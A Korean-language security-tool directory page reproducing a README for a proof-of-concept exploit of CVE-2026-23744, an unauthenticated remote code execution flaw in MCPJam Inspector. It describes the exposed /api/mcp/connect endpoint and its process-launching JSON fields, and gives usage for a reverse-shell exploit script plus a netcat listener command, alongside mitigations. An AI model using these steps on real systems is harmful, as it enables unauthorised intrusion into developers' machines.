Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2026-23744 | Kitploit
도구/GitHubGitHub/rohit-sundar/cve-2026-23744
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationRemote Access ToolLabs & Practice
GitHubrohit-sundar/cve-2026-23744

cve-2026-23744

저장소 보기
1개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-23744 – MCPJam Inspector 무인증 원격 코드 실행 (RCE)

설명

  • 제품: MCPJam Inspector
  • 영향을 받는 버전: ≤ 1.4.2
  • 수정된 버전: 1.4.3
  • 유형: 무인증 원격 코드 실행 (RCE)
  • 공격 경로: 네트워크
  • 인증 필요: 아니요
  • 사용자 상호작용 필요: 아니요
  • CVSS v3.1: 9.8 (치명적)

CVE-2026-23744는 MCPJam Inspector ≤ 1.4.2에 영향을 미치는 치명적인 무인증 원격 코드 실행 (RCE) 취약점입니다. 이 문제는 Inspector가 사용자가 제어하는 MCP 서버 구성을 허용하고 적절한 인증 또는 보안 제한 없이 프로세스 실행을 트리거할 수 있는 관리 엔드포인트(/api/mcp/connect)를 노출하기 때문에 발생합니다. 영향을 받는 버전은 기본적으로 localhost 대신 0.0.0.0(모든 인터페이스)에서 수신 대기하므로, 서비스가 네트워크에서 접근 가능한 경우 원격 악용이 가능합니다.

기술적 세부 사항

이 취약점은 다음 엔드포인트와 관련이 있습니다:

root@kitploit:~
POST /api/mcp/connect

이 엔드포인트는 서버 구성을 포함한 JSON 객체를 허용합니다. 예를 들면 다음과 같습니다:

root@kitploit:~
{
  "serverConfig": {
    "command": "<executable>",
    "args": ["<arguments>"],
    "env": {}
  },
  "serverId": "<identifier>"
}

이렇게 제공된 구성은 MCPJam Inspector가 새 MCP 서버 프로세스를 생성하고 관리하는 데 사용됩니다. 엔드포인트에 충분한 인증 및 보안 통제가 없기 때문에, 공격자는 Inspector 서비스에 의해 실행되는 임의의 프로세스 정의를 제출할 수 있습니다.

근본적으로 이 취약점은 중요 기능에 대한 인증 누락 (CWE-306) 문제로, 애플리케이션이 신뢰할 수 있는 로컬 사용자를 위해 설계된 기능을 네트워크를 통해 적절한 보안 검사 없이 접근 가능하게 노출합니다.

근본 원인

이 취약점은 두 가지 설계 결함에서 발생합니다:

  1. 프로세스 관리에 대한 무인증 접근
  • API는 사용자가 MCP 서버가 시작되는 방식을 정의할 수 있게 합니다.
  • 중요한 기능이 인증 없이 접근 가능합니다.
  • 사용자가 제어하는 프로세스 매개변수는 추가 검증 없이 애플리케이션에 의해 신뢰됩니다.
  1. 안전하지 않은 기본 노출
  • MCPJam Inspector는 기본적으로 0.0.0.0에서 수신 대기합니다.
  • 관리 API는 네트워크의 다른 시스템에서 도달할 수 있습니다.
  • 공격자는 프로세스 생성 기능과 직접 원격으로 상호작용할 수 있습니다.

결과적인 공격 경로는 다음과 같이 시각화할 수 있습니다:

root@kitploit:~
Attacker → /api/mcp/connect → Process Creation → Operating System

애플리케이션이 운영 체제 프로세스 생성과 직접 인터페이스하므로, 성공적인 악용은 MCPJam Inspector 서비스의 보안 컨텍스트 내에서 임의의 명령 실행으로 이어질 수 있습니다.

사용법

root@kitploit:~
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port>
  • -t (또는) --target: 대상 URL 또는 대상 IP 주소.
  • -tport (또는) --target-port: 연결할 대상 포트. 대부분의 경우 MCPJam Inspector의 경우 6274입니다. MCPJam Inspector가 서브도메인이나 가상 호스트와 같은 다른 곳에 호스팅된 경우 이 인수를 사용하지 마십시오. 대신 -t 인수를 사용하여 서브도메인 또는 가상 호스트를 지정하십시오.
  • -lhost (또는) --local-host: 리버스 셸이 연결될 공인 IP 주소.
  • -lport (또는) --local-port: 리버스 셸에 사용할 포트.
root@kitploit:~
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port> -c '<command>'
  • -c (또는) --command: 대상에서 실행할 명령.

이 프로그램을 사용하기 전에 먼저 Netcat을 사용하여 로컬 머신에서 리스너를 시작해야 합니다.

이렇게 하려면 다음 명령을 사용하십시오:

root@kitploit:~
nc -lvnp <port>

그런 다음 위 명령을 실행하여 대상에서 리버스 셸을 얻으십시오.

영향

성공적인 악용을 통해 공격자는 다음을 수행할 수 있습니다:

  • 대상 호스트에서 임의의 명령 실행,
  • 민감한 파일 읽기 또는 수정,
  • 지속성 메커니즘 설치,
  • 추가 악성코드 또는 도구 배포,
  • 환경 내 다른 시스템으로의 피벗,
  • 서비스 권한에 따라 완전한 시스템 손상 가능성.

이 취약점은 네트워크 기반 공격 벡터, 인증 부재, 사용자 상호작용 부재, 기밀성·무결성·가용성에 대한 높은 영향으로 인해 CVSS v3.1 점수 9.8 (치명적) 로 지정되었습니다.

완화 조치

즉시 MCPJam Inspector 1.4.3 이상으로 업그레이드하십시오. 추가 방어 조치는 다음과 같습니다:

  • Inspector 인터페이스에 대한 접근 제한,
  • 가능한 경우 localhost에 서비스 바인딩,
  • 방화벽 규칙을 통한 노출 제한,
  • 필요한 최소 권한으로 서비스 실행,
  • 승인되지 않은 접근 시도 모니터링.

면책 조항

이 PoC는 교육, 방어적 보안 연구, 그리고 승인된 보안 테스트를 위한 것입니다. 명시적 허가를 받은 시스템에 대해서만 사용해야 합니다. 제3자 시스템에 대한 무단 사용은 해당 법률 및 규정을 위반할 수 있습니다. 이 저장소의 소유자는 이 프로그램 사용으로 인해 발생하는 어떠한 손해에 대해서도 책임을 지지 않습니다.

출처

  1. MITRE CVE Record – CVE-2026-23744
  2. NIST National Vulnerability Database (NVD) – CVE-2026-23744
  3. GitHub Security Advisory (GHSA-232v-j27c-5pp6)
  4. CVE-2026-23744 – Vulnerability Lookup
  5. CVE-2026-23744: Critical RCE in MCPJam Inspector Targeting Developers – CrowdSec
  6. CVE-2026-23744: MCPJam Inspector RCE Vulnerability – SentinelOne
도구 다운로드